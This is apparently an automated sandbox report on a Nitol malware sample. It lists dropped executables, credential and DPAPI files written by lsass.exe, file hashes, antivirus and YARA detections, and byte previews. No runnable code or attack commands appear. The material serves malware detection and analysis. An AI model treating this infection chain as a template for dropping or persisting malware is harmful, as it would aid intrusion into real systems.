SSDEEP:	192:LYOYxPxjcZlUqqjOsg2VnyGYsM7NS7RaB7gUf/Qy8Ff+VwCdDpVePY7GDUQESJ:k/xpjcIqqiIVnN7M74igy8BJCN6g7GwW
MD5:	526457C3714FD5F9B2DF0221C2659C15
SHA1:	158390B936D0F9BB382AA2D0120C77983FC39589
SHA-256:	57A74456EBB827DBA8022F7C1F905FD8B640E7E4AF5D1CBF0130D76184FCC551
SHA-512:	99B2D3D6F65C74D752E31EC07534B0B263FDF7F14528FC83915DDF1D107F5C7CA4E208A283D262C4DA729170D9EFED3664782643E19D78EA2FB3A6253D600E54
Malicious:	false
Preview:	....t+..................z..O.............C.s...u..... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ...P8.+...R.;kq)AZ...d9..C"h................. ....."f.}6....w.&....&...p.zB.V y.p......2..;....[...Le.0....`.D....y..VL..i..&..L..o.V..\|w...JCi.......\|...[...6y[.5.....ra..j~.g.'".<..1g...rc..B.3c.......x....+...7J...`.!:I. .F._._!.....I6..x+.\|....&=.....S.df.\..H.yh.48m.y....VD"M#.M._.<.<...Y.m.6.....,...E....A.....5.Y.O.l...K.k..G..:D3n.....d.d!.....'x.cKKEp(E.3@......1..j.g&A.).....5..;.y..c<...............P{i ..?sl.TN....rVpws3.ru.xx4.J2x.....n.g.p7...#!N./.#..._J....S.\|...B.[6.z?....S.u.6...i.d..9..-.5.g....N.._...izq...=a9t.P.....f...).?.~.r..Lb.o...Xc...s.iY.?.>.e~...y...H...m"..~DK....1.(.&>2a.t............Q...5........R\|....... ...g/Rcv..r.C.j..A%n..E..N..(.....8df7....wz.....<....E.Z.7.G;.o..Q"[".G.G....>m...GQw9.R. f.EC..L0.l}>......e.+...Y..K.......2\..qj..\..RX..R.h_:.yN.........Q......D.......2...z..`,L..[(

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\SOFTWARE.LOG (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	522752
Entropy (8bit):	7.583230633752463
Encrypted:	false
SSDEEP:	12288:XkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:XGQ1QXdYgkdBW3hs/W0t419vRP5SE
MD5:	F3F920AAF85289A8E532890BC618AADD
SHA1:	89DC59B51068D7B0B42404AE0746B0249A7F0410
SHA-256:	018B3CD8B7C6D4B100329625C262FF2F2C98DE2F1B41FB259591D99B78E1979A
SHA-512:	143222F2F1E0C8F20CC434879811C436C5C1BD04605AC073CDCD49D5E6876B99A011E693A987FCCADE96ED77BFFA804679EA771BAA66ADE035961E9D7237CBBC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 97%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.O.-.O.-.O.-.`&.K.-.h.V.M.-. `'.D.-. `).M.-..c#.L.-.yY).L.-.O.,..-.yY&.H.-.y+.N.-.RichO.-.................PE..L........................N...H.......,.......`....@..........................@...............................................m..P....................................................................................`..x...xi.......................text...BL.......N.................. ..`.rdata.......`.......R..............@..@.data................h..............@....rsrc................x..............`...rhxpypg......0...................... ...xcmhltj............................. ...hnrxhix............................. ...woslvkg............................. ...eszpqhx..............z.............. ...orzkedv..............Z.............. ...zwezcbc......p.......:.............. ...uuxeujz......P...................... ...xgmlxsd......0..................

C:\Users\user\AppData\Local\Temp\hrl97AF.tmp

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	522752
Entropy (8bit):	7.583230633752463
Encrypted:	false
SSDEEP:	12288:XkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:XGQ1QXdYgkdBW3hs/W0t419vRP5SE
MD5:	F3F920AAF85289A8E532890BC618AADD
SHA1:	89DC59B51068D7B0B42404AE0746B0249A7F0410
SHA-256:	018B3CD8B7C6D4B100329625C262FF2F2C98DE2F1B41FB259591D99B78E1979A
SHA-512:	143222F2F1E0C8F20CC434879811C436C5C1BD04605AC073CDCD49D5E6876B99A011E693A987FCCADE96ED77BFFA804679EA771BAA66ADE035961E9D7237CBBC
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.O.-.O.-.O.-.`&.K.-.h.V.M.-. `'.D.-. `).M.-..c#.L.-.yY).L.-.O.,..-.yY&.H.-.y+.N.-.RichO.-.................PE..L........................N...H.......,.......`....@..........................@...............................................m..P....................................................................................`..x...xi.......................text...BL.......N.................. ..`.rdata.......`.......R..............@..@.data................h..............@....rsrc................x..............`...rhxpypg......0...................... ...xcmhltj............................. ...hnrxhix............................. ...woslvkg............................. ...eszpqhx..............z.............. ...orzkedv..............Z.............. ...zwezcbc......p.......:.............. ...uuxeujz......P...................... ...xgmlxsd......0..................

C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	522752
Entropy (8bit):	7.583230633752463
Encrypted:	false
SSDEEP:	12288:XkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:XGQ1QXdYgkdBW3hs/W0t419vRP5SE
MD5:	F3F920AAF85289A8E532890BC618AADD
SHA1:	89DC59B51068D7B0B42404AE0746B0249A7F0410
SHA-256:	018B3CD8B7C6D4B100329625C262FF2F2C98DE2F1B41FB259591D99B78E1979A
SHA-512:	143222F2F1E0C8F20CC434879811C436C5C1BD04605AC073CDCD49D5E6876B99A011E693A987FCCADE96ED77BFFA804679EA771BAA66ADE035961E9D7237CBBC
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.O.-.O.-.O.-.`&.K.-.h.V.M.-. `'.D.-. `).M.-..c#.L.-.yY).L.-.O.,..-.yY&.H.-.y+.N.-.RichO.-.................PE..L........................N...H.......,.......`....@..........................@...............................................m..P....................................................................................`..x...xi.......................text...BL.......N.................. ..`.rdata.......`.......R..............@..@.data................h..............@....rsrc................x..............`...rhxpypg......0...................... ...xcmhltj............................. ...hnrxhix............................. ...woslvkg............................. ...eszpqhx..............z.............. ...orzkedv..............Z.............. ...zwezcbc......p.......:.............. ...uuxeujz......P...................... ...xgmlxsd......0..................

C:\Users\user\AppData\Local\Temp\hrlA367.tmp

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	522752
Entropy (8bit):	7.583230633752463
Encrypted:	false
SSDEEP:	12288:XkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:XGQ1QXdYgkdBW3hs/W0t419vRP5SE
MD5:	F3F920AAF85289A8E532890BC618AADD
SHA1:	89DC59B51068D7B0B42404AE0746B0249A7F0410
SHA-256:	018B3CD8B7C6D4B100329625C262FF2F2C98DE2F1B41FB259591D99B78E1979A
SHA-512:	143222F2F1E0C8F20CC434879811C436C5C1BD04605AC073CDCD49D5E6876B99A011E693A987FCCADE96ED77BFFA804679EA771BAA66ADE035961E9D7237CBBC
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.O.-.O.-.O.-.`&.K.-.h.V.M.-. `'.D.-. `).M.-..c#.L.-.yY).L.-.O.,..-.yY&.H.-.y+.N.-.RichO.-.................PE..L........................N...H.......,.......`....@..........................@...............................................m..P....................................................................................`..x...xi.......................text...BL.......N.................. ..`.rdata.......`.......R..............@..@.data................h..............@....rsrc................x..............`...rhxpypg......0...................... ...xcmhltj............................. ...hnrxhix............................. ...woslvkg............................. ...eszpqhx..............z.............. ...orzkedv..............Z.............. ...zwezcbc......p.......:.............. ...uuxeujz......P...................... ...xgmlxsd......0..................

C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	522752
Entropy (8bit):	7.583230633752463
Encrypted:	false
SSDEEP:	12288:XkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:XGQ1QXdYgkdBW3hs/W0t419vRP5SE
MD5:	F3F920AAF85289A8E532890BC618AADD
SHA1:	89DC59B51068D7B0B42404AE0746B0249A7F0410
SHA-256:	018B3CD8B7C6D4B100329625C262FF2F2C98DE2F1B41FB259591D99B78E1979A
SHA-512:	143222F2F1E0C8F20CC434879811C436C5C1BD04605AC073CDCD49D5E6876B99A011E693A987FCCADE96ED77BFFA804679EA771BAA66ADE035961E9D7237CBBC
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.O.-.O.-.O.-.`&.K.-.h.V.M.-. `'.D.-. `).M.-..c#.L.-.yY).L.-.O.,..-.yY&.H.-.y+.N.-.RichO.-.................PE..L........................N...H.......,.......`....@..........................@...............................................m..P....................................................................................`..x...xi.......................text...BL.......N.................. ..`.rdata.......`.......R..............@..@.data................h..............@....rsrc................x..............`...rhxpypg......0...................... ...xcmhltj............................. ...hnrxhix............................. ...woslvkg............................. ...eszpqhx..............z.............. ...orzkedv..............Z.............. ...zwezcbc......p.......:.............. ...uuxeujz......P...................... ...xgmlxsd......0..................

C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp

Download File

Process:	C:\Windows\System32\loaddll32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	522752
Entropy (8bit):	7.583230633752463
Encrypted:	false
SSDEEP:	12288:XkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:XGQ1QXdYgkdBW3hs/W0t419vRP5SE
MD5:	F3F920AAF85289A8E532890BC618AADD
SHA1:	89DC59B51068D7B0B42404AE0746B0249A7F0410
SHA-256:	018B3CD8B7C6D4B100329625C262FF2F2C98DE2F1B41FB259591D99B78E1979A
SHA-512:	143222F2F1E0C8F20CC434879811C436C5C1BD04605AC073CDCD49D5E6876B99A011E693A987FCCADE96ED77BFFA804679EA771BAA66ADE035961E9D7237CBBC
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.O.-.O.-.O.-.`&.K.-.h.V.M.-. `'.D.-. `).M.-..c#.L.-.yY).L.-.O.,..-.yY&.H.-.y+.N.-.RichO.-.................PE..L........................N...H.......,.......`....@..........................@...............................................m..P....................................................................................`..x...xi.......................text...BL.......N.................. ..`.rdata.......`.......R..............@..@.data................h..............@....rsrc................x..............`...rhxpypg......0...................... ...xcmhltj............................. ...hnrxhix............................. ...woslvkg............................. ...eszpqhx..............z.............. ...orzkedv..............Z.............. ...zwezcbc......p.......:.............. ...uuxeujz......P...................... ...xgmlxsd......0..................

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\1306eb95-1ab6-43bf-b773-ac80ff75f2fc

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	468
Entropy (8bit):	6.321838356895524
Encrypted:	false
SSDEEP:	12:Vlqic6jwH6b5EoXb02Anp7NvzEe0YYDFT3f8tEr:PqiLjrb5TXQ2ARNvejJbktEr
MD5:	34FCD55E39BE1DD6A37972E58853F617
SHA1:	A3F8EAC0AB537209F5FFCE183EA9CE7B4A3226A2
SHA-256:	3EDAC4AEA4B234C4DAF6719C0C71D232CDFBD9BB87FCE4A98289044F8D726857
SHA-512:	4571046E27C6BADACA952E754B31D1486B94D23D9C7A338C01D9273A4F621C7313CEFC6362DFD8B2C0170945F5B639914CCFD3BCEC7C892CA7D8A891FDDD8279
Malicious:	false
Preview:	............1.3.0.6.e.b.9.5.-.1.a.b.6.-.4.3.b.f.-.b.7.7.3.-.a.c.8.0.f.f.7.5.f.2.f.c...................................................M...<.x.....C.@........f..o..~`.I.*...%.l)y.-.O.......apK..?.'.....G..g?h..L.^>E..5...E......../......V$.Urh...e\|....{.....wo.c..rP..c.Q:.U\>Ew.8.6.....@.ha!.~........>6..6x.B...;EG@........f..t...L7>Zr...4.........x...3Q.e....4.^..r-....L].Tv.Z.5.8~/hi...s%I4y.kn..-..v9V.\...0`...MbI.h7.D.....s...>........HL..M..F.}...

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.501629167387823
Encrypted:	false
SSDEEP:	3:GfWLN:GE
MD5:	8C206B1FEB44A87639D37B5B3BB42CC3
SHA1:	DDE021A105CDE051502647CD8BCCB42804B488AE
SHA-256:	A5C373CC15106BA0EE6E85E0A651FC95316C7F987B517556D82D3121DD9C3B4D
SHA-512:	A060BD26620E88F4025B1C30A76C7310AD5DE6AE21DC93DFCB9BD134CA24B3947411E955BADDAAA2AC20E4CD4A4CB2AD63365457AB32D04ED82502778F92E1E5
Malicious:	false
Preview:	.......C.s...u.........

C:\Windows\SysWOW64\zvhcfa.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	522752
Entropy (8bit):	7.583230633752463
Encrypted:	false
SSDEEP:	12288:XkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:XGQ1QXdYgkdBW3hs/W0t419vRP5SE
MD5:	F3F920AAF85289A8E532890BC618AADD
SHA1:	89DC59B51068D7B0B42404AE0746B0249A7F0410
SHA-256:	018B3CD8B7C6D4B100329625C262FF2F2C98DE2F1B41FB259591D99B78E1979A
SHA-512:	143222F2F1E0C8F20CC434879811C436C5C1BD04605AC073CDCD49D5E6876B99A011E693A987FCCADE96ED77BFFA804679EA771BAA66ADE035961E9D7237CBBC
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Windows\SysWOW64\zvhcfa.exe, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Windows\SysWOW64\zvhcfa.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.O.-.O.-.O.-.`&.K.-.h.V.M.-. `'.D.-. `).M.-..c#.L.-.yY).L.-.O.,..-.yY&.H.-.y+.N.-.RichO.-.................PE..L........................N...H.......,.......`....@..........................@...............................................m..P....................................................................................`..x...xi.......................text...BL.......N.................. ..`.rdata.......`.......R..............@..@.data................h..............@....rsrc................x..............`...rhxpypg......0...................... ...xcmhltj............................. ...hnrxhix............................. ...woslvkg............................. ...eszpqhx..............z.............. ...orzkedv..............Z.............. ...zwezcbc......p.......:.............. ...uuxeujz......P...................... ...xgmlxsd......0..................

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\6cac72b7-3651-45b8-933a-942b0f95b1c5

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	468
Entropy (8bit):	6.176585217304232
Encrypted:	false
SSDEEP:	12:nlfkubZezT9bBc0IibnGK01TWf/Y1Jg9r0vpwI4DyG:bbAjcgTgq3ravpF4e
MD5:	9B2655A35C60ECFEAF07B879AC295992
SHA1:	BCDEDD2973A2BC751FC138AC618E6994F58552EA
SHA-256:	AD15CBD628FA38AFAE6D9B5A14C8AAD7CABC0162E91B52424730EE4D60E15D8A
SHA-512:	86858807D3BFF727328AD8068381E62A2D11419656D890A931D7AE8FF3B8A7BAD2213A4D0C66E31BD58641FDB1F02757CF1B6E81ED5DD27C34E4DF772190299B
Malicious:	false
Preview:	............6.c.a.c.7.2.b.7.-.3.6.5.1.-.4.5.b.8.-.9.3.3.a.-.9.4.2.b.0.f.9.5.b.1.c.5....................................................w.'*..Ij.O.g.@........f..Npj./=..P.....~...&....H.8X...!...>LF.j.'mM.Q.8..)...h...u(]N.(`\|...M..#..Z=.I.....]7.PV.\..M..T.Z...!!HB..I...}..1.V....-.)...?~.X.!@l..........i.@.o.}YA.C@........f..E.V.)0....&..O.......18.]8Y.\|H....Fr............O.[..=h..9.H6c..^.....D.-..MXh......\|>.d.....2.9 i...A.R..?.Y....................

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.501629167387824
Encrypted:	false
SSDEEP:	3:5dzYUeR:YUs
MD5:	1C7A9069463873EBC576EDEC5D451B19
SHA1:	86B91B81E00B8CDDA233FB8796ECA60861E5D688
SHA-256:	E4601391E93653968F3D9329EC5F5475D5A18111399A486DA2981D742BE3BFE1
SHA-512:	0D0C1B0DE706722E19C48619266AE9977ECFBEFF78EBA1C016C7DE6FE99735C0CE00B3BB2818020755AFD90927D24EAD8AC4676B5B5ECA841CD746A39E9D8F59
Malicious:	false
Preview:	.r.lQ6.E.:.+.....%....

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4680
Entropy (8bit):	3.71107512505382
Encrypted:	false
SSDEEP:	96:pYMguQII4i166h4aGdinipV9ll7UY5HAmzQ+:9A4E/xne7HO+
MD5:	FFA2D66011CECB78FE85DE6DB0E4A13F
SHA1:	FE47852A434B8F0AE54AEEB9E965BE6846B3A29F
SHA-256:	16391F9186940E7DDB4A035381D5E50656D5EE77275C32FB8DE9BCC1985BBB63
SHA-512:	6FFFFB0328231E3BAE63E72E076A1848D429FD45AF826C05B96DA8366C035C672A727528474CA0A0D5ED09B06F925A160A0BDDF77F5DA618A3F635A02B55C768
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	11136
Entropy (8bit):	7.978267280066255
Encrypted:	false
SSDEEP:	192:PYvMCnnYV0ZNNv4tGO/dGbvS5nQmhV9/a/cBoSw7/k6ADS5eO7j8R2OeCS41:wvDYV0PBYQbvS5zV9/a4oSwme5V8R2Ob
MD5:	76F5DFD4AF291E03129A18536B25B9FE
SHA1:	2222956809D19F69BA3924E76D79765B1D1C93B4
SHA-256:	E2DE9946CA0C1BDBEE3BBB840DF63E2F5CE0129AD9B2CE85ECA4863611561488
SHA-512:	7905202DB3FC789085D755DF6AED5E289241B22340947038902D0F3D3C8567A8847C525F2659E0144C528073DF4D72E5B0BB3008CEDE2305E8342D7ECD809AA7
Malicious:	false
Preview:	....t+..................z..O.......r.lQ6.E.:.+....... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ...hj.F{.<q.h?..p....f..()..@.e.J............ .....`.....bKo..bM.d......m].F.,. p...x.>..\|..i{.$....F..z.x..i....[z....:}Kq..H7....i...(..R..[.J..<[O..R...}$.......G.Bk.K..bX..4....y&w"..:}8j<,.E....h....q..x6.I.2..........=...fO....>1.ay.Us]qr..M.$..9.P.R.w.j..d....AQ.U.$@.. PR..O....E...M..X(..Z?...:........Df.......t..a..i.C..-.s.....n.....O..2V.b_..g.4.%...Z....0.@,.?5g4.F..`..Z.xjkc...v..b..v..B......J.s.+.....G.[..B...."..``N,...e..%...+c..dIMy.yLM.L.T.;.g. ?.I..-ir.+.eQv.....co.T.b......~U..,Y..3>iC..B....(./...kFh9`3'..iR..O...i....a.....5gPan=0`'.ri..$amM....'....W..{?..D.).K......7%..+.).c...=O.Am.E..).].>O.....+.l...gn.!.%g.c7\|W.[.W.v>.......1el}...9OJ....q..A.t..4~.^~..........e.9i......m...X..[...p.m.....7....d..)...).M.Z>...G...9....Z.M....Z.Nmi.Z. .q0.HI.u!4.........fi.......h.#P....\|.G.....7U.....p.E.u.2..".Ky...

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	11120
Entropy (8bit):	3.881720177090452
Encrypted:	false
SSDEEP:	192:uc9WFrAXldf/Ug8bDWm+BinGWm+F4comGQWm+esxeJESbogSkmlO9:uQWYld3/aDWpinGWN4coyWGQ8EJgvmla
MD5:	4F96521F65FE3A6EE37708F3CBDC0462
SHA1:	DCE41A9008B35AFD852C46D6FBDF4B0771F92A95
SHA-256:	FC3F30301C2503AC566CBCC1649CA2D5034D6F39D362BD361759DAC1C3D6F214
SHA-512:	9B44E53728B2D096B48057AF1BFC982C3DEE5E0A7B50830437B37AC526D5442EF37DCC3AA1D953F9F521862E932EE586AE8D8D1896E711DA0A97A781F193AFE9
Malicious:	false
Preview:	ElfChnk.................+.......2...........`....... ......................................................................N..............$...............................=...........................................................................................$...........................R...m...............F...........................t...................M...c...................&.......l...........................................................................N...........................................**......+.......sj.."R........2s..&.......2s...\|.Y2....a..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..`............{..P.r.o.v.i.d.e.r...=....=.......K...N.a.m.e.......A.p.p.l.i.c.a.t.i.o.n. .E.r.r.o.r..A..M............a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 308, DIRTY
Category:	dropped
Size (bytes):	160616
Entropy (8bit):	3.925012130936425
Encrypted:	false
SSDEEP:	1536:nHi6xadptrX9WPJHi6xadptrX9WPCHi6xadptrX9WP/:YptrX9WPyptrX9WPPptrX9WP/
MD5:	057A2AD3683B2C5916C4B4664F7EB096
SHA1:	3F86356ABC99C0C53706182EA66820FA5AE83012
SHA-256:	2120F9DFD68175295641B02953DA947F71E2B630654A25720E9A562A1B88DA2B
SHA-512:	61A064E3A8BA5F0E7F2CA06B2BF78933B9A8E3AB298FB06A6F0CC0A8D4783B1AF4C9250D0EAE0ADD56681C74DC7EC5845EECC2F1279ACE4F60FE7BD4D885CC83
Malicious:	false
Preview:	ElfFile.................4....................................................................................................T!.ElfChnk.........5...............5.................._.r........................................................................k................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.395899590686579
Encrypted:	false
SSDEEP:	384:vhngNDwNAVN/NdNlN5N4NNNs7NMNmNFNoNiNzN2NeYNbMNe7N6vGiN7kFIN1O5yj:vENmkkkWehzqqVvKy9JzWc/Tr4
MD5:	D856B43262F32A03FBBFC7220F487E91
SHA1:	66786F6A43AFBA1FD30F49C2F7F5001B12D2542D
SHA-256:	20484562759D4F8E9BE30BC155F5B80629A9C794A564C3B80826F06F3E780AFF
SHA-512:	5FBDC3678511622F6537F5A046E96B76EE2782DEFCBBF2C404A5A6C60F4B4622A2BA80F13A602A355ECD36C2D4EA53BA1AA7FCCFC0F623C8BD1282FDC8DDB4C9
Malicious:	false
